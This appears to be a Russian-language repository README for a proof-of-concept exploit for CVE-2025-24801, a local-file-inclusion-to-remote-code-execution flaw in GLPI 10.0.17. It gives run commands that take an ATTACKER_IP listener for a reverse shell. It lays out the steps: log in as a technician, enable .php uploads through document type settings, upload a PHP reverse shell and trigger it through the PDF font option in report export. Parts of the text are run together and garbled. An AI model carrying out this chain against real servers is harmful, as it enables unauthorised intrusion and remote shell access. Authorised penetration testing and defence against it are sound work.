
Доказательство концепции эксплуатации для CVE-2025-24801, уязвимости LFI-to-RCE в GLPI 10.0.17. Автоматизирует вход в систему, включает загрузку PHP-файлов и загружает reverse shell для авторизованного тестирования безопасности.
Этот репозиторий содержит скрипт proof-of-concept (poc.py), который эксплуатирует CVE-2025-24801 — уязвимость LFI-to-RCE в GLPI 10.0.17. Он автоматизирует:
.php путем обновления настроек типа документаgit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: Базовый URL экземпляра GLPI (например, )https://example.com/glpi--user / --password: Действительные учетные данные техника GLPI--lhost / --lport: IP-адрес и порт атакующего для слушателя reverse shellСкрипт автоматически использует --doc-id 1 по умолчанию для обновления первого типа документа.
После выполнения скрипт:
.php, обновив тип документа с ID 1exploit.php, содержащий полезную нагрузку PHP reverse shellЗатем вам нужно будет вручную вызвать LFI, указав имя загруженного файла во включении шрифта PDF (например, через функцию экспорта отчетов), чтобы добиться RCE.
/front/login.php и отправляет учетные данные для аутентификации./front/documenttype.form.php?id=1, разбирает CSRF-токен и добавляет php в список разрешенных расширений./front/ticket.form.php для получения CSRF-токена, затем использует /ajax/fileupload.php (с X-Requested-With: XMLHttpRequest) для загрузки PHP reverse shell.pdffont при экспорте отчета.Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Не используйте его против систем без явного разрешения.
Создано для образовательных и авторизованных тестов на проникновение.